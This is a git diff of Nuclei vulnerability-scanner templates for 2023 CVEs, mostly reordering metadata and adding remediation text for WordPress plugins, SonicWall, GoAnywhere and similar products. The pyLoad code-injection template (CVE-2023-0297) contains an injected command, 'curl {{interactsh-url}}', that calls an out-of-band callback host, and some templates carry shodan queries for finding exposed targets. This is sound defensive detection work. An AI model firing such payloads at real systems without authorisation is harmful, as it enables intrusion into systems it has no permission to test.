++++---- http/cves/2023/CVE-2023-0669.yaml | 8 +++++--- http/cves/2023/CVE-2023-0942.yaml | 8 ++++---- http/cves/2023/CVE-2023-0948.yaml | 8 ++++---- http/cves/2023/CVE-2023-0968.yaml | 8 ++++---- http/cves/2023/CVE-2023-1020.yaml | 8 +++++--- http/cves/2023/CVE-2023-1080.yaml | 8 ++++---- http/cves/2023/CVE-2023-1177.yaml | 8 +++++--- http/cves/2023/CVE-2023-1362.yaml | 6 ++++-- http/cves/2023/CVE-2023-1434.yaml | 4 +++- http/cves/2023/CVE-2023-1454.yaml | 8 +++++--- http/cves/2023/CVE-2023-1496.yaml | 8 +++++--- http/cves/2023/CVE-2023-1546.yaml | 8 ++++---- http/cves/2023/CVE-2023-1671.yaml | 10 ++++++---- http/cves/2023/CVE-2023-1698.yaml | 6 ++++-- http/cves/2023/CVE-2023-1730.yaml | 8 ++++---- http/cves/2023/CVE-2023-1835.yaml | 8 +++++--- http/cves/2023/CVE-2023-1890.yaml | 8 ++++---- http/cves/2023/CVE-2023-20073.yaml | 12 +++++++----- http/cves/2023/CVE-2023-2023.yaml | 8 ++++---- http/cves/2023/CVE-2023-20864.yaml | 8 +++++--- http/cves/2023/CVE-2023-20887.yaml | 10 ++++++---- http/cves/2023/CVE-2023-20888.yaml | 6 ++++-- http/cves/2023/CVE-2023-20889.yaml | 6 ++++-- http/cves/2023/CVE-2023-2122.yaml | 8 ++++---- http/cves/2023/CVE-2023-2130.yaml | 6 ++++-- http/cves/2023/CVE-2023-2178.yaml | 8 +++++--- http/cves/2023/CVE-2023-22478.yaml | 10 ++++++---- http/cves/2023/CVE-2023-22480.yaml | 10 ++++++---- http/cves/2023/CVE-2023-2252.yaml | 4 ++-- http/cves/2023/CVE-2023-22620.yaml | 8 ++++---- http/cves/2023/CVE-2023-2272.yaml | 8 +++++--- http/cves/2023/CVE-2023-22897.yaml | 8 +++++--- http/cves/2023/CVE-2023-23161.yaml | 8 +++++--- http/cves/2023/CVE-2023-23333.yaml | 10 ++++++---- http/cves/2023/CVE-2023-23488.yaml | 8 +++++--- http/cves/2023/CVE-2023-23489.yaml | 8 +++++--- http/cves/2023/CVE-2023-23491.yaml | 10 +++++----- http/cves/2023/CVE-2023-23492.yaml | 10 +++++----- http/cves/2023/CVE-2023-2356.yaml | 10 ++++++---- http/cves/2023/CVE-2023-23752.yaml | 8 ++++---- http/cves/2023/CVE-2023-24044.yaml | 10 ++++++---- http/cves/2023/CVE-2023-24243.yaml | 10 ++++++---- http/cves/2023/CVE-2023-24278.yaml | 8 +++++--- http/cves/2023/CVE-2023-24322.yaml | 8 +++++--- http/cves/2023/CVE-2023-24367.yaml | 4 +++- http/cves/2023/CVE-2023-24488.yaml | 6 ++++-- http/cves/2023/CVE-2023-24489.yaml | 8 +++++--- http/cves/2023/CVE-2023-24657.yaml | 8 +++++--- http/cves/2023/CVE-2023-24733.yaml | 8 +++++--- .../{CVE-2023-24735.yaml => CVE-2023-24735 2.yaml} | 8 +++++--- http/cves/2023/CVE-2023-24737.yaml | 8 +++++--- http/cves/2023/CVE-2023-25135.yaml | 10 +++++----- http/cves/2023/CVE-2023-25157.yaml | 8 +++++--- http/cves/2023/CVE-2023-25346.yaml | 6 ++++-- http/cves/2023/CVE-2023-25717.yaml | 10 ++++++---- http/cves/2023/CVE-2023-26067.yaml | 8 +++++--- http/cves/2023/CVE-2023-26255.yaml | 8 +++++--- http/cves/2023/CVE-2023-26256.yaml | 8 +++++--- http/cves/2023/CVE-2023-26360.yaml | 8 +++++--- http/cves/2023/CVE-2023-26469.yaml | 8 +++++--- http/cves/2023/CVE-2023-2648.yaml | 8 ++++---- http/cves/2023/CVE-2023-26842.yaml | 6 ++++-- http/cves/2023/CVE-2023-26843.yaml | 6 ++++-- http/cves/2023/CVE-2023-27008.yaml | 8 +++++--- http/cves/2023/CVE-2023-27034.yaml | 6 ++++-- http/cves/2023/CVE-2023-27159.yaml | 8 +++++--- http/cves/2023/CVE-2023-27179.yaml | 6 ++++-- http/cves/2023/CVE-2023-27292.yaml | 8 +++++--- http/cves/2023/CVE-2023-2732.yaml | 8 +++++--- http/cves/2023/CVE-2023-27350.yaml | 8 +++++--- http/cves/2023/CVE-2023-27372.yaml | 8 +++++--- http/cves/2023/CVE-2023-27482.yaml | 10 +++++----- http/cves/2023/CVE-2023-27524.yaml | 8 +++++--- http/cves/2023/CVE-2023-27587.yaml | 4 ++-- http/cves/2023/CVE-2023-2780.yaml | 8 +++++--- http/cves/2023/CVE-2023-2796.yaml | 12 ++++++------ http/cves/2023/CVE-2023-28121.yaml | 10 ++++++---- http/cves/2023/CVE-2023-2822.yaml | 8 ++++---- http/cves/2023/CVE-2023-2825.yaml | 8 +++++--- http/cves/2023/CVE-2023-28343.yaml | 8 +++++--- http/cves/2023/CVE-2023-28432.yaml | 10 +++++----- http/cves/2023/CVE-2023-28665.yaml | 8 ++++---- http/cves/2023/CVE-2023-29084.yaml | 4 +++- http/cves/2023/CVE-2023-29298.yaml | 10 ++++++---- http/cves/2023/CVE-2023-29300.yaml | 10 ++++++---- http/cves/2023/CVE-2023-29489.yaml | 8 +++++--- http/cves/2023/CVE-2023-29622.yaml | 6 ++++-- http/cves/2023/CVE-2023-29623.yaml | 6 ++++-- http/cves/2023/CVE-2023-2982.yaml | 8 ++++---- http/cves/2023/CVE-2023-29887.yaml | 6 ++++-- http/cves/2023/CVE-2023-29919.yaml | 8 +++++--- http/cves/2023/CVE-2023-29922.yaml | 10 ++++++---- http/cves/2023/CVE-2023-29923.yaml | 8 +++++--- http/cves/2023/CVE-2023-30019.yaml | 8 +++++--- http/cves/2023/CVE-2023-30150.yaml | 10 ++++++---- http/cves/2023/CVE-2023-30210.yaml | 6 ++++-- http/cves/2023/CVE-2023-30212.yaml | 6 ++++-- http/cves/2023/CVE-2023-30256.yaml | 6 ++++-- http/cves/2023/CVE-2023-30777.yaml | 8 ++++---- http/cves/2023/CVE-2023-31059.yaml | 10 ++++++---- http/cves/2023/CVE-2023-31548.yaml | 6 ++++-- http/cves/2023/CVE-2023-32117.yaml | 4 ++-- http/cves/2023/CVE-2023-32235.yaml | 10 +++++----- http/cves/2023/CVE-2023-32243.yaml | 10 ++++++---- http/cves/2023/CVE-2023-32315.yaml | 10 +++++----- http/cves/2023/CVE-2023-32563.yaml | 6 ++++-- http/cves/2023/CVE-2023-33338.yaml | 6 ++++-- http/cves/2023/CVE-2023-33439.yaml | 6 ++++-- http/cves/2023/CVE-2023-33440.yaml | 6 ++++-- http/cves/2023/CVE-2023-3345.yaml | 8 +++++--- http/cves/2023/CVE-2023-33510.yaml | 10 ++++++---- http/cves/2023/CVE-2023-33568.yaml | 8 +++++--- http/cves/2023/CVE-2023-34124.yaml | 8 +++++--- http/cves/2023/CVE-2023-34192.yaml | 6 ++++-- http/cves/2023/CVE-2023-34362.yaml | 8 +++++--- http/cves/2023/CVE-2023-34537.yaml | 6 ++++-- http/cves/2023/CVE-2023-34598.yaml | 10 ++++++---- http/cves/2023/CVE-2023-34599.yaml | 6 ++++-- http/cves/2023/CVE-2023-3460.yaml | 10 ++++++---- http/cves/2023/CVE-2023-34659.yaml | 6 ++++-- http/cves/2023/CVE-2023-3479.yaml | 8 +++++--- http/cves/2023/CVE-2023-34843.yaml | 8 +++++--- http/cves/2023/CVE-2023-34960.yaml | 8 +++++--- http/cves/2023/CVE-2023-35078.yaml | 10 ++++++---- http/cves/2023/CVE-2023-35082.yaml | 10 +++++----- http/cves/2023/CVE-2023-35843.yaml | 8 +++++--- http/cves/2023/CVE-2023-35844.yaml | 8 +++++--- http/cves/2023/CVE-2023-35885.yaml | 8 +++++--- http/cves/2023/CVE-2023-36287.yaml | 6 ++++-- http/cves/2023/CVE-2023-36289.yaml | 6 ++++-- http/cves/2023/CVE-2023-36346.yaml | 5 +++-- http/cves/2023/CVE-2023-36844.yaml | 8 +++++--- http/cves/2023/CVE-2023-36934.yaml | 8 +++++--- http/cves/2023/CVE-2023-37265.yaml | 8 ++++---- http/cves/2023/CVE-2023-37266.yaml | 8 ++++---- http/cves/2023/CVE-2023-37270.yaml | 8 +++++--- http/cves/2023/CVE-2023-37462.yaml | 10 +++++----- http/cves/2023/CVE-2023-37580.yaml | 8 +++++--- http/cves/2023/CVE-2023-3765.yaml | 8 +++++--- http/cves/2023/CVE-2023-38035.yaml | 8 +++++--- http/cves/2023/CVE-2023-38205.yaml | 10 ++++++---- http/cves/2023/CVE-2023-3836.yaml | 10 ++++++---- http/cves/2023/CVE-2023-38646.yaml | 8 +++++--- http/cves/2023/CVE-2023-39026.yaml | 8 +++++--- http/cves/2023/CVE-2023-39120.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 8 +++++--- http/cves/2023/CVE-2023-39143.yaml | 8 +++++--- http/cves/2023/CVE-2023-3936.yaml | 8 +++++--- http/cves/2023/CVE-2023-4173.yaml | 8 +++++--- http/cves/2023/CVE-2023-4174.yaml | 8 +++++--- http/cves/2023/CVE-2023-4634.yaml | 2 +- 163 files changed, 762 insertions(+), 516 deletions(-) rename http/cves/2023/{CVE-2023-24735.yaml => CVE-2023-24735 2.yaml} (91%) diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index f44059ffd3..45fba91329 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 115 reference: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 - https://wordpress.org/plugins/simple-urls/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0099 - remediation: Fixed in version 115 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: getlasso product: simple_urls + framework: wordpress tags: xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,cve,cve2023 http: diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 58f98dd937..0f2fc78f8a 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + remediation: | + Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 - https://github.com/advisories/GHSA-mr28-27qx-phg3 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-0126 cwe-id: CWE-22 epss-score: 0.03359 - cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* epss-percentile: 0.90145 + cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Appliance Management Console Login" verified: "true" + max-request: 1 vendor: sonicwall product: sma1000_firmware + shodan-query: title:"Appliance Management Console Login" tags: cve,cve2023,sonicwall,lfi,sma1000 http: diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 524b343c1d..5ffd50bc83 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + remediation: Fixed in version 2.0.10. reference: - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8 - https://nvd.nist.gov/vuln/detail/CVE-2023-0236 - remediation: Fixed in version 2.0.10. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0236 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: themeum product: tutor_lms + framework: wordpress tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated http: diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 307a05371d..458a7aa48f 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -6,25 +6,25 @@ info: severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 - https://wordpress.org/plugins/wp-tripadvisor-review-slider/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0261 - remediation: Fixed in version 10.8. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 epss-score: 0.01065 - cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* epss-percentile: 0.8235 + cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ljapps product: wp_tripadvisor_review_slider + framework: wordpress tags: cve2023,wordpress,wp,wp-tripadvisor-review-slider,auth,cve,sqli,wp-plugin,wpscan http: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index fdfcee5b18..2868378f31 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + remediation: | + Upgrade PyLoad to a version that is not affected by this vulnerability. reference: - https://www.exploit-db.com/exploits/51532 - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-0297 cwe-id: CWE-94 epss-score: 0.32256 - cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* epss-percentile: 0.96441 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: html:"pyload" + max-request: 2 vendor: pyload product: pyload + shodan-query: html:"pyload" tags: huntr,packetstorm,cve,cve2023,rce,pyload,oast variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 6d32978356..18287debda 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. + remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 - remediation: Fixed in version 4.3 and above classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/wp-helper-lite" - framework: wordpress + max-request: 1 vendor: matbao product: wp_helper_premium + framework: wordpress + publicwww-query: "/wp-content/plugins/wp-helper-lite" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite http: diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 6811957124..215d0c79be 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor. reference: - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05 - https://wordpress.org/plugins/member-database/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-0514 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29093 + cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: membership_database_project product: membership_database + framework: wordpress tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss http: diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 9dc604d39e..6ae8f09795 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -5,7 +5,9 @@ info: author: Harsh severity: medium description: | - A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input "> leads to cross site scripting. The attack may be launched remotely. + A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219596 - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 @@ -17,9 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.00779 + epss-score: 0.00582 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* - epss-percentile: 0.79143 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index e29f4a3f1e..12cd92e1cb 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Fixed in version 3.8.2.3. reference: - https://wpscan.com/vulnerability/832c6155-a413-4641-849c-b98ba55e8551 - https://nvd.nist.gov/vuln/detail/CVE-2023-0552 - remediation: | - Fixed in version 3.8.2.3. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.0007 - cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* epss-percentile: 0.28777 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: genetechsolutions product: pie_register + framework: wordpress tags: cve2023,redirect,pie,pie-register,wpscan,cve http: diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 9490023057..c5b5f90068 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219716 - https://nvd.nist.gov/vuln/detail/CVE-2023-0562 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-0562 cwe-id: CWE-89 epss-score: 0.01124 - cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82821 + cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: bank_locker_management_system_project product: bank_locker_management_system tags: cve,cve2023,blms,sqli,bypass diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index 676a95a9c3..a8a1b009da 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219717 - https://nvd.nist.gov/vuln/detail/CVE-2023-0563 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-0563 cwe-id: CWE-79 epss-score: 0.00563 - cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.74832 + cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: bank_locker_management_system_project product: bank_locker_management_system tags: cve,cve2023,blms,xss diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 7bc16a393c..b46c50a689 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -6,25 +6,25 @@ info: severity: high description: | The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + remediation: Fixed in version 4.9.3.3 reference: - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 - https://wordpress.org/plugins/wp-slimstat - https://nvd.nist.gov/vuln/detail/CVE-2023-0630 - remediation: Fixed in version 4.9.3.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 epss-score: 0.03477 - cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90291 + cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: wp-slimstat product: slimstat_analytics + framework: wordpress tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated http: diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 04db2bfb26..13f97fc05b 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-0669 cwe-id: CWE-502 epss-score: 0.96578 - cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* epss-percentile: 0.99443 + cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1484947000 verified: true + max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer + shodan-query: http.favicon.hash:1484947000 tags: cve,cve2023,rce,goanywhere,oast,kev http: diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 02d27d3301..c1ddcfb5fd 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -6,27 +6,27 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 2.5.5. reference: - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511 - https://wordpress.org/plugins/woocommerce-for-japan/ - https://plugins.trac.wordpress.org/browser/woocommerce-for-japan/trunk/includes/admin/views/html-admin-setting-screen.php#L63 - https://nvd.nist.gov/vuln/detail/CVE-2023-0942 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail= - remediation: Fixed in version 2.5.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 epss-score: 0.00374 - cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.69277 + cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: artisanworkshop product: japanized_for_woocommerce + framework: wordpress tags: cve2023,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,cve,xss,woocommerce,plugin http: diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 4ea8e9b927..e8714be571 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 2.5.8. reference: - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718 - https://wordpress.org/plugins/woocommerce-for-japan/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0948 - remediation: Fixed in version 2.5.8. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29093 + cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: "true" - framework: wordpress + max-request: 2 vendor: artisanworkshop product: japanized_for_woocommerce + framework: wordpress tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated http: diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 3023622ffc..0aff482ab3 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -6,27 +6,27 @@ info: severity: medium description: | WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin. + remediation: Fixed in version 3.3.9.1. reference: - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595 - https://wordpress.org/plugins/watu/ - https://plugins.trac.wordpress.org/browser/watu/trunk/views/takings.php#L31 